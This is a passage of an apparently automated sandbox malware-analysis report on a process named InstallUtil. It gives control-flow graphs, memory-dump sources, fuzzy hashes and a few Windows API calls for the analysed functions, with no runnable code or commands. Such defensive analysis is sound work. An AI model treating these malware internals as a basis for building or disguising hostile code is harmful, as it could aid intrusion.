                                                                                                          control_flow_graph 526 5f1ad48-5f1ad66 527 5f1ad68-5f1ad6b 526->527 528 5f1ad6d-5f1ad89 527->528 529 5f1ad8e-5f1ad91 527->529 528->529 530 5f1ada1-5f1ada4 529->530 531 5f1ad93-5f1ad9c 529->531 533 5f1adb5-5f1adb8 530->533 534 5f1ada6-5f1adaa 530->534 531->530 537 5f1adba-5f1adc7 533->537 538 5f1adcc-5f1adcf 533->538 535 5f1adb0 534->535 536 5f1af74-5f1af7b 534->536 535->533 542 5f1af7c-5f1af7e 536->542 537->538 539 5f1add1-5f1adda 538->539 540 5f1ade9-5f1adec 538->540 543 5f1ade0-5f1ade4 539->543 544 5f1af7f-5f1af89 539->544 545 5f1adf6-5f1adf9 540->545 546 5f1adee-5f1adf3 540->546 543->540 544->536 554 5f1af8b-5f1af90 544->554 548 5f1ae13-5f1ae16 545->548 549 5f1adfb-5f1ae0e 545->549 546->545 551 5f1af65-5f1af6e 548->551 552 5f1ae1c-5f1ae1e 548->552 549->548 551->536 551->539 555 5f1ae20 552->555 556 5f1ae25-5f1ae28 552->556 554->542 557 5f1af93-5f1afb6 554->557 555->556 556->527 558 5f1ae2e-5f1ae52 556->558 559 5f1afb8-5f1afbb 557->559 571 5f1af62 558->571 572 5f1ae58-5f1ae67 558->572 560 5f1afbd-5f1afd9 559->560 561 5f1afde-5f1afe1 559->561 560->561 563 5f1afe3-5f1afe7 561->563 564 5f1afee-5f1aff1 561->564 566 5f1b007-5f1b042 563->566 567 5f1afe9 563->567 568 5f1aff3-5f1affd 564->568 569 5f1affe-5f1b001 564->569 581 5f1b235-5f1b248 566->581 582 5f1b048-5f1b054 566->582 567->564 569->566 573 5f1b26a-5f1b26d 569->573 571->551 584 5f1ae69-5f1ae6f 572->584 585 5f1ae7f-5f1aeba call 5f16618 572->585 575 5f1b27c-5f1b27e 573->575 576 5f1b26f 573->576 579 5f1b280 575->579 580 5f1b285-5f1b288 575->580 652 5f1b26f call 5f1b2a2 576->652 653 5f1b26f call 5f1b2a7 576->653 579->580 580->559 586 5f1b28e-5f1b298 580->586 587 5f1b24a 581->587 592 5f1b074-5f1b0b8 582->592 593 5f1b056-5f1b06f 582->593 583 5f1b275-5f1b277 583->575 588 5f1ae71 584->588 589 5f1ae73-5f1ae75 584->589 603 5f1aed2-5f1aee9 585->603 604 5f1aebc-5f1aec2 585->604 587->573 588->585 589->585 609 5f1b0d4-5f1b113 592->609 610 5f1b0ba-5f1b0cc 592->610 593->587 616 5f1af01-5f1af12 603->616 617 5f1aeeb-5f1aef1 603->617 605 5f1aec4 604->605 606 5f1aec6-5f1aec8 604->606 605->603 606->603 614 5f1b119-5f1b1f4 call 5f16618 609->614 615 5f1b1fa-5f1b20f 609->615 610->609 614->615 615->581 624 5f1af14-5f1af1a 616->624 625 5f1af2a-5f1af5b 616->625 619 5f1aef3 617->619 620 5f1aef5-5f1aef7 617->620 619->616 620->616 627 5f1af1c 624->627 628 5f1af1e-5f1af20 624->628 625->571 627->625 628->625 652->583 653->583
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2402495122.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_5f10000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: XMv$XMv$$^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-2714710795
                                                                                                          • Opcode ID: 05a2a81e03ba609557ade8957c8d4009cbcffd606be10a68724ac7b2cbd5f5b8
                                                                                                          • Instruction ID: 5a2afa08f4aa72a141b12c6082b9011addcbaa9f370eac64c2fa01860f867eb0
                                                                                                          • Opcode Fuzzy Hash: 05a2a81e03ba609557ade8957c8d4009cbcffd606be10a68724ac7b2cbd5f5b8
                                                                                                          • Instruction Fuzzy Hash: 29E14131E0120ACFCB15DF69D484AAEB7B3FF85304F14852AD8099B358DB39D946CB95
                                                                                                          Function 05F0B318 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 201COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 782 5f0b318-5f0b327 783 5f0b353-5f0b357 782->783 784 5f0b329-5f0b336 call 5f0a2ac 782->784 785 5f0b359-5f0b363 783->785 786 5f0b36b-5f0b3ac 783->786 789 5f0b338-5f0b346 call 5f0b5a2 784->789 790 5f0b34c 784->790 785->786 793 5f0b3b9-5f0b3c7 786->793 794 5f0b3ae-5f0b3b6 786->794 789->790 800 5f0b488-5f0b548 789->800 790->783 796 5f0b3c9-5f0b3ce 793->796 797 5f0b3eb-5f0b3ed 793->797 794->793 798 5f0b3d0-5f0b3d7 call 5f0a2b8 796->798 799 5f0b3d9 796->799 801 5f0b3f0-5f0b3f7 797->801 803 5f0b3db-5f0b3e9 798->803 799->803 833 5f0b550-5f0b57b GetModuleHandleW 800->833 834 5f0b54a-5f0b54d 800->834 804 5f0b404-5f0b40b 801->804 805 5f0b3f9-5f0b401 801->805 803->801 807 5f0b418-5f0b421 call 5f03934 804->807 808 5f0b40d-5f0b415 804->808 805->804 813 5f0b423-5f0b42b 807->813 814 5f0b42e-5f0b433 807->814 808->807 813->814 816 5f0b451-5f0b45e 814->816 817 5f0b435-5f0b43c 814->817 823 5f0b460-5f0b47e 816->823 824 5f0b481-5f0b487 816->824 817->816 818 5f0b43e-5f0b44e call 5f08af8 call 5f0a2c8 817->818 818->816 823->824 835 5f0b584-5f0b598 833->835 836 5f0b57d-5f0b583 833->836 834->833 836->835
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2402415672.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_5f00000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleModule
                                                                                                          • String ID: XTw$XTw
                                                                                                          • API String ID: 4139908857-217199934
                                                                                                          • Opcode ID: 4799ae48179f9bc46a4bdbc2c9a2d71d515fd821dceffac6839cf50da27c4d04
                                                                                                          • Instruction ID: 99f01fe1f6330bccd36e6253ecf7c308a16a75538129a16f4e380f900674a5e2
                                                                                                          • Opcode Fuzzy Hash: 4799ae48179f9bc46a4bdbc2c9a2d71d515fd821dceffac6839cf50da27c4d04
                                                                                                          • Instruction Fuzzy Hash: F5814870A00B058FDB64DF29D44576ABBF2FF88300F14892DD48AD7A90DB79E945CB91
                                                                                                          Function 05F191C0 Relevance: 5.2, Strings: 4, Instructions: 231COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 839 5f191c0-5f191e5 840 5f191e7-5f191ea 839->840 841 5f19210-5f19213 840->841 842 5f191ec-5f1920b 840->842 843 5f19ad3-5f19ad5 841->843 844 5f19219-5f1922e 841->844 842->841 845 5f19ad7 843->845 846 5f19adc-5f19adf 843->846 850 5f19230-5f19236 844->850 851 5f19246-5f1925c 844->851 845->846 846->840 849 5f19ae5-5f19aef 846->849 853 5f19238 850->853 854 5f1923a-5f1923c 850->854 856 5f19267-5f19269 851->856 853->851 854->851 857 5f19281-5f192f2 856->857 858 5f1926b-5f19271 856->858 869 5f192f4-5f19317 857->869 870 5f1931e-5f1933a 857->870 859 5f19273 858->859 860 5f19275-5f19277 858->860 859->857 860->857 869->870 875 5f19366-5f19381 870->875 876 5f1933c-5f1935f 870->876 881 5f19383-5f193a5 875->881 882 5f193ac-5f193c7 875->882 876->875 881->882 887 5f193f2-5f193fc 882->887 888 5f193c9-5f193eb 882->888 889 5f1940c-5f19486 887->889 890 5f193fe-5f19407 887->890 888->887 896 5f194d3-5f194e8 889->896 897 5f19488-5f194a6 889->897 890->849 896->843 901 5f194c2-5f194d1 897->901 902 5f194a8-5f194b7 897->902 901->896 901->897 902->901
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2402495122.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_5f10000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q$$^q
                                                                                                          • API String ID: 0-2125118731
                                                                                                          • Opcode ID: 27fddcf8b149eb3c3fbd3204889cacc8e3f736c3f8767f30c656180041f032bd
                                                                                                          • Instruction ID: 6f7ba153cd435a388044a2c2581781b565e84a3afd66b4aa99e267c169aa016d
                                                                                                          • Opcode Fuzzy Hash: 27fddcf8b149eb3c3fbd3204889cacc8e3f736c3f8767f30c656180041f032bd
                                                                                                          • Instruction Fuzzy Hash: CF915334F0020A9FDB54DB65D960BAEB3F6FFC9204F148469C809EB348EA74DD468B95
                                                                                                          Function 05F1CFB8 Relevance: 4.5, Strings: 3, Instructions: 797COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 905 5f1cfb8-5f1cfd3 906 5f1cfd5-5f1cfd8 905->906 907 5f1d4a4-5f1d4b0 906->907 908 5f1cfde-5f1cfe1 906->908 909 5f1d4b6-5f1d7a3 907->909 910 5f1d26e-5f1d27d 907->910 911 5f1cff0-5f1cff3 908->911 912 5f1cfe3-5f1cfe5 908->912 1120 5f1d7a9-5f1d7af 909->1120 1121 5f1d9ca-5f1d9d4 909->1121 915 5f1d28c-5f1d298 910->915 916 5f1d27f-5f1d284 910->916 913 5f1d002-5f1d005 911->913 914 5f1cff5-5f1cff7 911->914 917 5f1d4a1 912->917 918 5f1cfeb 912->918 921 5f1d007-5f1d049 913->921 922 5f1d04e-5f1d051 913->922 919 5f1cffd 914->919 920 5f1d35f-5f1d368 914->920 923 5f1d9d5-5f1da0e 915->923 924 5f1d29e-5f1d2b0 915->924 916->915 917->907 918->911 919->913 928 5f1d377-5f1d383 920->928 929 5f1d36a-5f1d36f 920->929 921->922 926 5f1d053-5f1d095 922->926 927 5f1d09a-5f1d09d 922->927 960 5f1da10-5f1da13 923->960 942 5f1d2b5-5f1d2b8 924->942 926->927 935 5f1d0e6-5f1d0e9 927->935 936 5f1d09f-5f1d0e1 927->936 931 5f1d494-5f1d499 928->931 932 5f1d389-5f1d39d 928->932 929->928 931->917 932->917 959 5f1d3a3-5f1d3b5 932->959 939 5f1d132-5f1d135 935->939 940 5f1d0eb-5f1d12d 935->940 936->935 943 5f1d152-5f1d155 939->943 944 5f1d137-5f1d14d 939->944 940->939 949 5f1d301-5f1d304 942->949 950 5f1d2ba-5f1d2fc 942->950 956 5f1d157-5f1d15c 943->956 957 5f1d15f-5f1d162 943->957 944->943 954 5f1d306-5f1d348 949->954 955 5f1d34d-5f1d34f 949->955 950->949 954->955 968 5f1d351 955->968 969 5f1d356-5f1d359 955->969 956->957 962 5f1d164-5f1d173 957->962 963 5f1d1ab-5f1d1ae 957->963 991 5f1d3b7-5f1d3bd 959->991 992 5f1d3d9-5f1d3db 959->992 964 5f1da15-5f1da41 960->964 965 5f1da46-5f1da49 960->965 974 5f1d182-5f1d18e 962->974 975 5f1d175-5f1d17a 962->975 978 5f1d1b0-5f1d1f2 963->978 979 5f1d1f7-5f1d1fa 963->979 964->965 976 5f1da58-5f1da5b 965->976 977 5f1da4b call 5f1db2d 965->977 968->969 969->906 969->920 974->923 985 5f1d194-5f1d1a6 974->985 975->974 986 5f1da5d-5f1da79 976->986 987 5f1da7e-5f1da80 976->987 998 5f1da51-5f1da53 977->998 978->979 982 5f1d243-5f1d246 979->982 983 5f1d1fc-5f1d23e 979->983 996 5f1d269-5f1d26c 982->996 997 5f1d248-5f1d264 982->997 983->982 985->963 986->987 1000 5f1da82 987->1000 1001 5f1da87-5f1da8a 987->1001 1003 5f1d3c1-5f1d3cd 991->1003 1004 5f1d3bf 991->1004 1008 5f1d3e5-5f1d3f1 992->1008 996->910 996->942 997->996 998->976 1000->1001 1001->960 1013 5f1da8c-5f1da9b 1001->1013 1005 5f1d3cf-5f1d3d7 1003->1005 1004->1005 1005->1008 1030 5f1d3f3-5f1d3fd 1008->1030 1031 5f1d3ff 1008->1031 1035 5f1db02-5f1db17 1013->1035 1036 5f1da9d-5f1db00 call 5f16618 1013->1036 1039 5f1d404-5f1d406 1030->1039 1031->1039 1048 5f1db18 1035->1048 1036->1035 1039->917 1042 5f1d40c-5f1d428 call 5f16618 1039->1042 1058 5f1d437-5f1d443 1042->1058 1059 5f1d42a-5f1d42f 1042->1059 1048->1048 1058->931 1062 5f1d445-5f1d492 1058->1062 1059->1058 1062->917 1122 5f1d7b1-5f1d7b6 1120->1122 1123 5f1d7be-5f1d7c7 1120->1123 1122->1123 1123->923 1124 5f1d7cd-5f1d7e0 1123->1124 1126 5f1d7e6-5f1d7ec 1124->1126 1127 5f1d9ba-5f1d9c4 1124->1127 1128 5f1d7fb-5f1d804 1126->1128 1129 5f1d7ee-5f1d7f3 1126->1129 1127->1120 1127->1121 1128->923 1130 5f1d80a-5f1d82b 1128->1130 1129->1128 1133 5f1d83a-5f1d843 1130->1133 1134 5f1d82d-5f1d832 1130->1134 1133->923 1135 5f1d849-5f1d866 1133->1135 1134->1133 1135->1127 1138 5f1d86c-5f1d872 1135->1138 1138->923 1139 5f1d878-5f1d891 1138->1139 1141 5f1d897-5f1d8be 1139->1141 1142 5f1d9ad-5f1d9b4 1139->1142 1141->923 1145 5f1d8c4-5f1d8ce 1141->1145 1142->1127 1142->1138 1145->923 1146 5f1d8d4-5f1d8eb 1145->1146 1148 5f1d8fa-5f1d915 1146->1148 1149 5f1d8ed-5f1d8f8 1146->1149 1148->1142 1154 5f1d91b-5f1d934 call 5f16618 1148->1154 1149->1148 1158 5f1d943-5f1d94c 1154->1158 1159 5f1d936-5f1d93b 1154->1159 1158->923 1160 5f1d952-5f1d9a6 1158->1160 1159->1158 1160->1142
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2402495122.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_5f10000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q$$^q
                                                                                                          • API String ID: 0-831282457
                                                                                                          • Opcode ID: 30bbd75dab9e0a587eef5ddd7d64b95840a772c195ada0b9392e21afc863e89d
                                                                                                          • Instruction ID: 3ccfd0aaae6d68298c8f5c080e4cd59aacdb56e5918a4850f7cef3478e0cfa45
                                                                                                          • Opcode Fuzzy Hash: 30bbd75dab9e0a587eef5ddd7d64b95840a772c195ada0b9392e21afc863e89d
                                                                                                          • Instruction Fuzzy Hash: 6D624F30A402069FCB55EB68D594E5DB7B2FF84304F108929D40ADF369EB75ED8ACB84
                                                                                                          Function 05F14C10 Relevance: 3.9, Strings: 3, Instructions: 186COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1168 5f14c10-5f14c34 1169 5f14c36-5f14c39 1168->1169 1170 5f14c3b-5f14c55 1169->1170 1171 5f14c5a-5f14c5d 1169->1171 1170->1171 1172 5f14c63-5f14d5b 1171->1172 1173 5f1533c-5f1533e 1171->1173 1191 5f14d61-5f14dae call 5f154b8 1172->1191 1192 5f14dde-5f14de5 1172->1192 1175 5f15340 1173->1175 1176 5f15345-5f15348 1173->1176 1175->1176 1176->1169 1177 5f1534e-5f1535b 1176->1177 1205 5f14db4-5f14dd0 1191->1205 1193 5f14e69-5f14e72 1192->1193 1194 5f14deb-5f14e5b 1192->1194 1193->1177 1211 5f14e66 1194->1211 1212 5f14e5d 1194->1212 1208 5f14dd2 1205->1208 1209 5f14ddb 1205->1209 1208->1209 1209->1192 1211->1193 1212->1211
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2402495122.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_5f10000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: fcq$XPcq$\Ocq
                                                                                                          • API String ID: 0-3575482020
                                                                                                          • Opcode ID: 52612247b790ab28e6b1d22d57e7c7a5d6a299df2e1b32f9314b28f800597deb
                                                                                                          • Instruction ID: 433e8f6e303d5aa2071cca78ab94311948764fbbbc22c073a46d542fa0310da2
                                                                                                          • Opcode Fuzzy Hash: 52612247b790ab28e6b1d22d57e7c7a5d6a299df2e1b32f9314b28f800597deb
                                                                                                          • Instruction Fuzzy Hash: 84615230F002099FDF549FA5C858BAEBAB7FB88700F20842AD50AEB395DF794D458B55
                                                                                                          Function 05F180E8 Relevance: 2.7, Strings: 2, Instructions: 248COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2216 5f180e8-5f18107 2217 5f18109-5f1810c 2216->2217 2218 5f18341-5f18344 2217->2218 2219 5f18112-5f18121 2217->2219 2220 5f18367-5f1836a 2218->2220 2221 5f18346-5f18362 2218->2221 2228 5f18140-5f18184 2219->2228 2229 5f18123-5f1813e 2219->2229 2223 5f18370-5f1837c 2220->2223 2224 5f18415-5f18417 2220->2224 2221->2220 2230 5f18387-5f18389 2223->2230 2225 5f18419 2224->2225 2226 5f1841e-5f18421 2224->2226 2225->2226 2226->2217 2231 5f18427-5f18430 2226->2231 2239 5f18315-5f1832a 2228->2239 2240 5f1818a-5f1819b 2228->2240 2229->2228 2232 5f183a1-5f183a5 2230->2232 2233 5f1838b-5f18391 2230->2233 2241 5f183b3 2232->2241 2242 5f183a7-5f183b1 2232->2242 2237 5f18393 2233->2237 2238 5f18395-5f18397 2233->2238 2237->2232 2238->2232 2239->2218 2249 5f181a1-5f181be 2240->2249 2250 5f18300-5f1830f 2240->2250 2244 5f183b8-5f183ba 2241->2244 2242->2244 2247 5f183cb-5f18404 2244->2247 2248 5f183bc-5f183bf 2244->2248 2247->2219 2260 5f1840a-5f18414 2247->2260 2248->2231 2249->2250 2257 5f181c4-5f182ba call 5f16618 2249->2257 2250->2239 2250->2240 2283 5f182c8 2257->2283 2284 5f182bc-5f182c6 2257->2284 2285 5f182cd-5f182cf 2283->2285 2284->2285 2285->2250 2286 5f182d1-5f182d6 2285->2286 2287 5f182e4 2286->2287 2288 5f182d8-5f182e2 2286->2288 2289 5f182e9-5f182eb 2287->2289 2288->2289 2289->2250 2290 5f182ed-5f182f9 2289->2290 2290->2250
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2402495122.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_5f10000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q
                                                                                                          • API String ID: 0-355816377
                                                                                                          • Opcode ID: f9718692f727a42e070928d8cc10e47ad4ef00db343f9a91d0c982f2ae0a8af5
                                                                                                          • Instruction ID: eb8bfedc32e67436ca2cd0edae5fa5227df243e639ddabe45c7bb6d91a0d8f1e
                                                                                                          • Opcode Fuzzy Hash: f9718692f727a42e070928d8cc10e47ad4ef00db343f9a91d0c982f2ae0a8af5
                                                                                                          • Instruction Fuzzy Hash: FF91B031B002058FCB14DF75DA50A6EB7E7BF84344F188529D80ADB398EB79DC468B95
                                                                                                          Function 05F191B3 Relevance: 2.7, Strings: 2, Instructions: 167COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2292 5f191b3-5f191e5 2294 5f191e7-5f191ea 2292->2294 2295 5f19210-5f19213 2294->2295 2296 5f191ec-5f1920b 2294->2296 2297 5f19ad3-5f19ad5 2295->2297 2298 5f19219-5f1922e 2295->2298 2296->2295 2299 5f19ad7 2297->2299 2300 5f19adc-5f19adf 2297->2300 2304 5f19230-5f19236 2298->2304 2305 5f19246-5f1925c 2298->2305 2299->2300 2300->2294 2303 5f19ae5-5f19aef 2300->2303 2307 5f19238 2304->2307 2308 5f1923a-5f1923c 2304->2308 2310 5f19267-5f19269 2305->2310 2307->2305 2308->2305 2311 5f19281-5f192f2 2310->2311 2312 5f1926b-5f19271 2310->2312 2323 5f192f4-5f19317 2311->2323 2324 5f1931e-5f1933a 2311->2324 2313 5f19273 2312->2313 2314 5f19275-5f19277 2312->2314 2313->2311 2314->2311 2323->2324 2329 5f19366-5f19381 2324->2329 2330 5f1933c-5f1935f 2324->2330 2335 5f19383-5f193a5 2329->2335 2336 5f193ac-5f193c7 2329->2336 2330->2329 2335->2336 2341 5f193f2-5f193fc 2336->2341 2342 5f193c9-5f193eb 2336->2342 2343 5f1940c-5f19486 2341->2343 2344 5f193fe-5f19407 2341->2344 2342->2341 2350 5f194d3-5f194e8 2343->2350 2351 5f19488-5f194a6 2343->2351 2344->2303 2350->2297 2355 5f194c2-5f194d1 2351->2355 2356 5f194a8-5f194b7 2351->2356 2355->2350 2355->2351 2356->2355
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2402495122.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_5f10000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $^q$$^q
                                                                                                          • API String ID: 0-355816377
                                                                                                          • Opcode ID: 608630ded850ae87780c36d14f7240e27b52125af1d01726ebfc77930d3e9d37
                                                                                                          • Instruction ID: 697b5ee057c63a4d1e57ced40374d725c324dd8dcddf536e9b1ea88a3c0d70a3
                                                                                                          • Opcode Fuzzy Hash: 608630ded850ae87780c36d14f7240e27b52125af1d01726ebfc77930d3e9d37
                                                                                                          • Instruction Fuzzy Hash: A8517330B001059FDB54DB64D9A0B6EB3F6FBC8604F14846AC80AEB388EA75DD468B95
                                                                                                          Function 05F14C00 Relevance: 2.6, Strings: 2, Instructions: 138COMMON
                                                                                                          Download Yara Rule

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 2359 5f14c00-5f14c34 2360 5f14c36-5f14c39 2359->2360 2361 5f14c3b-5f14c55 2360->2361 2362 5f14c5a-5f14c5d 2360->2362 2361->2362 2363 5f14c63-5f14d5b 2362->2363 2364 5f1533c-5f1533e 2362->2364 2382 5f14d61-5f14dae call 5f154b8 2363->2382 2383 5f14dde-5f14de5 2363->2383 2366 5f15340 2364->2366 2367 5f15345-5f15348 2364->2367 2366->2367 2367->2360 2368 5f1534e-5f1535b 2367->2368 2396 5f14db4-5f14dd0 2382->2396 2384 5f14e69-5f14e72 2383->2384 2385 5f14deb-5f14e5b 2383->2385 2384->2368 2402 5f14e66 2385->2402 2403 5f14e5d 2385->2403 2399 5f14dd2 2396->2399 2400 5f14ddb 2396->2400 2399->2400 2400->2383 2402->2384 2403->2402
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2402495122.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_5f10000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: fcq$XPcq
                                                                                                          • API String ID: 0-936005338
                                                                                                          • Opcode ID: 0455e4046b4b5f6866a305284fa5d564039d2dbb2e4b8d63a8cb3e3aa21dcf44
                                                                                                          • Instruction ID: e6d499c206d76ec3e2d8fb3e79bf10b36ab59fb3d7f7b3adc9a5a2672b5af37a
                                                                                                          • Opcode Fuzzy Hash: 0455e4046b4b5f6866a305284fa5d564039d2dbb2e4b8d63a8cb3e3aa21dcf44
                                                                                                          • Instruction Fuzzy Hash: F8517330B002089FDB049FA5C4597AEBAF7FBC8700F20852AE50A9B395DB758D058B85
                                                                                                          Function 05F0D4E4 Relevance: 1.6, APIs: 1, Instructions: 119COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05F0D602
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2402415672.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_5f00000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 716092398-0
                                                                                                          • Opcode ID: e8b30e0d1b6ceada5b7e31b33994ec18a37bdbdcd40f82ffbc8cfdf2a85b4297
                                                                                                          • Instruction ID: 43872fa130f98f4f00580df036d73f85e3557b96f031a8f5ed99f0105de50b1e
                                                                                                          • Opcode Fuzzy Hash: e8b30e0d1b6ceada5b7e31b33994ec18a37bdbdcd40f82ffbc8cfdf2a85b4297
                                                                                                          • Instruction Fuzzy Hash: EA51E0B5D003499FDB14CFA9C884ADEBFB5BF48310F24812AE819AB250D774A885CF91
                                                                                                          Function 05F0D4F0 Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05F0D602
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2402415672.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_5f00000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 716092398-0
                                                                                                          • Opcode ID: ee47dfe13a8f80f18281d7368e7d5cc506f6819ccb8441fe2242c71006d270ab
                                                                                                          • Instruction ID: 70dbaa46f38dfc0ba6b9c7cc0156b5f922f694d3c3e4f5fe3055a064fb8bae51
                                                                                                          • Opcode Fuzzy Hash: ee47dfe13a8f80f18281d7368e7d5cc506f6819ccb8441fe2242c71006d270ab
                                                                                                          • Instruction Fuzzy Hash: 1241CFB5D003099FDB14CFA9C884ADEBBB5BF48314F24812AE819AB250D774A885CF91
                                                                                                          Function 05F0E46C Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 05F0FCF1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2402415672.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_5f00000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CallProcWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 2714655100-0
                                                                                                          • Opcode ID: f9e0f467dfe9489a4178c99bccc4ffc6f101d36e04d7108f1a32afdcd616886c
                                                                                                          • Instruction ID: 6df33b886a549a9988edc6d227d534fab56e257eb7becea829288fa6c473a432
                                                                                                          • Opcode Fuzzy Hash: f9e0f467dfe9489a4178c99bccc4ffc6f101d36e04d7108f1a32afdcd616886c
                                                                                                          • Instruction Fuzzy Hash: 51412CB9A00305DFDB14DF99C448AAAFBF5FB88314F28C459D519A7361C774A941CFA0
                                                                                                          Function 05F03048 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05F030D7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2402415672.0000000005F00000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F00000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_5f00000_InstallUtil.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DuplicateHandle
                                                                                                          • String ID:
                                                                                                          • API String ID: 3793708945-0
                                                                                                          • Opcode ID: ab8c974dd14e78fb0ea9beea33fe9477bdbbbb863647d21a8542b1af815463c8
                                                                                                          • Instruction ID: c4fcccafcb4cda1e8835eb7a9327b2327bad4199e40f256c9d6c4aea8b80eaf4
                                                                                                          • Opcode Fuzzy Hash: ab8c974dd14e78fb0ea9beea33fe9477bdbbbb863647d21a8542b1af815463c8
                                                                                                          • Instruction Fuzzy Hash: 682114B5D00208DFDB10CFA9D484AEEBBF4FB48310F14841AE954A3350D378A940DFA1
                                                                                                          Function 05F03050 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 05F030D7
                                                                                                          Memory Dump Source
